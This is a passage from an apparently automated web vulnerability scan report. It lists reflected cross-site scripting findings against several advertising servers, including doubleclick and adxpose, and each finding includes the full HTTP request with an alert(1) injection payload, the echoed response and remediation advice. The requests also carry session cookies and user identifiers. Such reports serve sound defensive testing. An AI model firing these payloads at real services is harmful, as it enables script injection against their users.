The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a436'-alert(1)-'1e02b24949 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=979573a436'-alert(1)-'1e02b24949&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2145
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:31 GMT
Expires: Tue, 08 Feb 2011 02:37:31 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c0/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B
...[SNIP]...
00/250%3B40453841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=979573a436'-alert(1)-'1e02b24949&_pn=17097094&redirect=;ord=7530561?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>
...[SNIP]...

1.16. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [_pn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de550'-alert(1)-'03ca2570388 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094de550'-alert(1)-'03ca2570388&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:32 GMT
Expires: Tue, 08 Feb 2011 02:37:32 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B
...[SNIP]...
3841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094de550'-alert(1)-'03ca2570388&redirect=;ord=7531530?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>
...[SNIP]...

1.17. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [_s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a2c1'-alert(1)-'16f489b5f1f was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=09a2c1'-alert(1)-'16f489b5f1f&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:29 GMT
Expires: Tue, 08 Feb 2011 02:37:29 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=09a2c1'-alert(1)-'16f489b5f1f&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=7528515?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>
...[SNIP]...

1.18. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac8bd'-alert(1)-'8cff4cbdcbd was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=ac8bd'-alert(1)-'8cff4cbdcbd HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2112
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:33 GMT
Expires: Tue, 08 Feb 2011 02:37:33 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/7/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B
...[SNIP]...
453841/40471628/1%3B%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=ac8bd'-alert(1)-'8cff4cbdcbd;ord=7532561?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>
...[SNIP]...

1.19. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94136'-alert(1)-'b9a6d1d5de1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb94136'-alert(1)-'b9a6d1d5de1&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:24 GMT
Expires: Tue, 08 Feb 2011 02:37:24 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb94136'-alert(1)-'b9a6d1d5de1&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=7523546?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLL
...[SNIP]...

1.20. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e51c'-alert(1)-'aa9ea0b725b was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=1939e51c'-alert(1)-'aa9ea0b725b&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfw)lg>By]-!h!'>_I$udMi:J<T#zJGib(!P*.RI<FKCnDh[uiT+^/2+eMLsoLb?^Dz+yufH7FWQ6/y8I42VHJ.4%+m=^T>-w#L5HjI=M>tS[B>RcnZ6T2lhKM#(w`kYnh]me8IXe<5$$-@o]FbRGN4@X`e`DiynIifj/x<.eMm_t-^T04B.3!87!=A6$`NN8QhJOdb'5%5[A9*=.@8!//wVWE<i:qf:041WiCRg7?`HN2w_^'Xbp6xqG!u(<ik8pm.eE*)cs4WekRnp.N6`Ow-_#nZljbUQhxpwPR2Z!$DZRf)pVH%0<JHBTE1(`9dJBRY#aMIZk?1qXe%-/hhrqWm%1fdRw3L6.X?M^VlzaV^AjhXisNEMf$D-E:>Ac%)^QgDi:2Pu3$hFNE'kc?8O^NJGs5W1X9/U50IrgTb9y*5GJDkg9^w1QF/iXp`p=EKk8^l$T93mFdiq%`MJ*1r@rU><qp_)Lf'BDvLSe`Hdb)O2uaBL>yo/rlKJh6r'._tK2vZ!ADROTU4`e

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 09-Feb-2011 02:09:39 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 09-May-2011 02:09:39 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Tue, 08 Feb 2011 02:09:39 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=1939e51c'-alert(1)-'aa9ea0b725b&external_user_id=4760492999213801733&expiration=0" width="0" height="0"/>');

1.21. http://admeld.adnxs.com/usersync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3994c'-alert(1)-'0d2a8bddf42 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match3994c'-alert(1)-'0d2a8bddf42 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfw)lg>By]-!h!'>_I$udMi:J<T#zJGib(!P*.RI<FKCnDh[uiT+^/2+eMLsoLb?^Dz+yufH7FWQ6/y8I42VHJ.4%+m=^T>-w#L5HjI=M>tS[B>RcnZ6T2lhKM#(w`kYnh]me8IXe<5$$-@o]FbRGN4@X`e`DiynIifj/x<.eMm_t-^T04B.3!87!=A6$`NN8QhJOdb'5%5[A9*=.@8!//wVWE<i:qf:041WiCRg7?`HN2w_^'Xbp6xqG!u(<ik8pm.eE*)cs4WekRnp.N6`Ow-_#nZljbUQhxpwPR2Z!$DZRf)pVH%0<JHBTE1(`9dJBRY#aMIZk?1qXe%-/hhrqWm%1fdRw3L6.X?M^VlzaV^AjhXisNEMf$D-E:>Ac%)^QgDi:2Pu3$hFNE'kc?8O^NJGs5W1X9/U50IrgTb9y*5GJDkg9^w1QF/iXp`p=EKk8^l$T93mFdiq%`MJ*1r@rU><qp_)Lf'BDvLSe`Hdb)O2uaBL>yo/rlKJh6r'._tK2vZ!ADROTU4`e

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 09-Feb-2011 02:09:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 09-May-2011 02:09:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Tue, 08 Feb 2011 02:09:51 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match3994c'-alert(1)-'0d2a8bddf42?admeld_adprovider_id=193&external_user_id=4760492999213801733&expiration=0" width="0" height="0"/>');

1.22. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload bc86f<script>alert(1)</script>71f7e59fb6 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1506171&pid=871775bc86f<script>alert(1)</script>71f7e59fb6&ps=-1&zw=470&zh=150&url=http%3A//www.nypost.com/&v=5&dct=New%20York%20News%20%7C%20Gossip%20%7C%20Sports%20%7C%20Entertainment%20%7C%20Photos%20-%20New%20York%20Post&metakw=breaking%20news,headline%20news,current%20news,late%20breaking%20news,current%20news%20events HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:08:42 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2508


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "871775bc86f<script>alert(1)</script>71f7e59fb6"

   
                                                           </head>
...[SNIP]...

1.23. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 48b92--><script>alert(1)</script>af79d177dbe was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=150617148b92--><script>alert(1)</script>af79d177dbe&pid=871775&ps=-1&zw=470&zh=150&url=http%3A//www.nypost.com/&v=5&dct=New%20York%20News%20%7C%20Gossip%20%7C%20Sports%20%7C%20Entertainment%20%7C%20Photos%20-%20New%20York%20Post&metakw=breaking%20news,headline%20news,current%20news,late%20breaking%20news,current%20news%20events HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:08:29 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3351


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "150617148b92--><script>alert(1)</script>af79d177dbe" -->
...[SNIP]...

1.24. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload e0894--><script>alert(1)</script>92409ecc7b8 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1506171&pid=871775&ps=-1e0894--><script>alert(1)</script>92409ecc7b8&zw=470&zh=150&url=http%3A//www.nypost.com/&v=5&dct=New%20York%20News%20%7C%20Gossip%20%7C%20Sports%20%7C%20Entertainment%20%7C%20Photos%20-%20New%20York%20Post&metakw=breaking%20news,headline%20news,current%20news,late%20breaking%20news,current%20news%20events HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:08:52 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3790


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-1e0894--><script>alert(1)</script>92409ecc7b8" -->
   
...[SNIP]...

1.25. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload a4738<script>alert(1)</script>f88ad01177e was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=M6uzDYEbWGBrvdnp_69536a4738<script>alert(1)</script>f88ad01177e HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2; JSESSIONID=FE63B20AA109FA6FB60FDC6E14F5F959

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A7A2A3A6B39BC5D8BC3D5B6D17528BD6; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:46:29 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
OSE_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_M6uzDYEbWGBrvdnp_69536a4738<script>alert(1)</script>f88ad01177e".replace(/[^\w\d]/g,""),"M6uzDYEbWGBrvdnp_69536a4738<script>
...[SNIP]...

1.26. http://ads.adxpose.com/ads/tag.js [altbannerurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/tag.js

Issue detail

The value of the altbannerurl request parameter is copied into the HTML document as plain text between tags. The payload 7b7f7<img%20src%3da%20onerror%3dalert(1)>865d86afc07 was submitted in the altbannerurl parameter. This input was echoed as 7b7f7<img src=a onerror=alert(1)>865d86afc07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69536&cid=EI9-DR-Interclick&vchannel=9075&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D51%2526b%253D9075%2526cid%253D7645468%2526isif%253Df%2526rurld%253Dwww.nypost.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.nypost.com%252F%2526rurl%253Dhttp%25253A%25252F%25252Fwww.nypost.com%25252F%2526blkAdxp%253D17b7f7<img%20src%3da%20onerror%3dalert(1)>865d86afc07 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=912E69DD8FDBA27C540045C338568E80; Path=/
Content-Type: text/javascript;charset=UTF-8
Content-Length: 730
Date: Tue, 08 Feb 2011 02:46:44 GMT
Connection: close

__ADXPOSE_PREFS__ = {"uid":"M6uzDYEbWGBrvdnp_69536","altbannerurl":"http%3A%2F%2Fa1.interclick.com%2FgetInPage.aspx%3Fa%3D51%26b%3D9075%26cid%3D7645468%26isif%3Df%26rurld%3Dwww.nypost.com%26sl%3Dtrue%26dvp%3Dhttp%253A%2F%2Fwww.nypost.com%2F%26rurl%3Dhttp%253A%252F%252Fwww.nypost.com%252F%26blkAdxp%3D17b7f7<img src=a onerror=alert(1)>865d86afc07","override":true,"vchannel":"9075","cid":"EI9-DR-Interclick","version":2};
document.write('<scr'+'ipt src="http://ads.adxpose.com/ads/ads.js?uid='+encodeURIComponent('M6uzDYEbWGBrvdnp_69536')+'" type=
...[SNIP]...

1.27. http://ads.adxpose.com/ads/tag.js [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
